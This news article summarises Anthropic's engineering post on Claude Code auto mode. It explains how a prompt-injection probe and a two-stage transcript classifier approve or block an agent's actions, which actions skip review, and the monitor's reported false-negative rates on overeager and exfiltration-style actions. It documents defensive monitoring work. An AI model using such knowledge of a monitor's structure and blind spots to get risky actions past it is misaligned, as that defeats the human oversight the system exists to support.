Skip to content
Decaying

Anthropic details Claude Code auto mode as a classifier-based middle ground for agent autonomy

Original: New on the Engineering Blog: How we designed Claude Code auto mode. Many Claude Code users let Claude work without permission prompts. Auto mode is a safer middle ground: we built and tested classifiers that make approval decisions instead. Read more: https://www.anthropic.com/engineering/claude-code-auto-mode View original →

Read in other languages: 한국어日本語
LLM Mar 26, 2026 By Insights AI 2 min read 78 views Source

What Anthropic posted on X

On March 25, 2026, Anthropic said many Claude Code users already let the agent run with minimal friction, noting that people approve 93% of permission prompts. The company introduced auto mode as a middle ground between constant manual approvals and fully disabling permissions, framing it as a way to reduce approval fatigue without handing the model unrestricted freedom.

That framing matters because coding agents are increasingly used in long-running sessions. If users are asked to approve nearly every action, the safety benefit of manual review can erode into habit. Anthropic is effectively arguing that a model-mediated approval layer can be safer than rote clicking while still being less disruptive than full sandbox setup.

What the engineering post adds

Anthropic says auto mode uses two layers of defense. First, a server-side prompt-injection probe screens tool outputs before they enter the agent context. Second, a transcript classifier evaluates risky actions before execution. The classifier runs in two stages: a fast first-pass filter and a reasoning-based second pass that only runs on flagged actions, which Anthropic says helps control latency and cost.

The post also explains how the permission boundary is structured. Safe read-only tools and some narrowly scoped allow rules can run immediately, routine edits inside the project directory avoid classifier latency, and higher-risk actions such as shell commands, web fetches, external integrations, subagent handoffs, or filesystem access outside the repo are sent to the final approval classifier. Anthropic says broad interpreter-style allow rules from manual mode do not carry over, because they would let the model bypass the system on exactly the commands that matter most.

Anthropic published concrete evaluation numbers too. In the reported end-to-end pipeline, the company says false positives on real internal traffic drop to 0.4%. On a smaller set of real overeager actions, Anthropic reports a 17% false-negative rate, and on synthetic data-exfiltration tasks it reports a 5.7% false-negative rate. The post is explicit that auto mode is intended to be materially safer than --dangerously-skip-permissions, not a replacement for careful human review on high-stakes infrastructure.

Why this matters

The broader signal is that agent vendors are turning operational safety into a product surface rather than leaving it as a manual policy problem. If classifier-based approval can absorb most routine actions while still blocking the most damaging ones, teams get a more usable path to autonomous coding sessions that would otherwise be too noisy to supervise manually.

At the same time, Anthropic's own numbers make the tradeoff clear. Auto mode is still a risk-managed compromise, not a guarantee. For practitioners, that candor is useful: it sets a realistic baseline for where model-mediated approval fits today and where human review still belongs.

Sources: Anthropic X post · Anthropic engineering post

Share: Long

Related Articles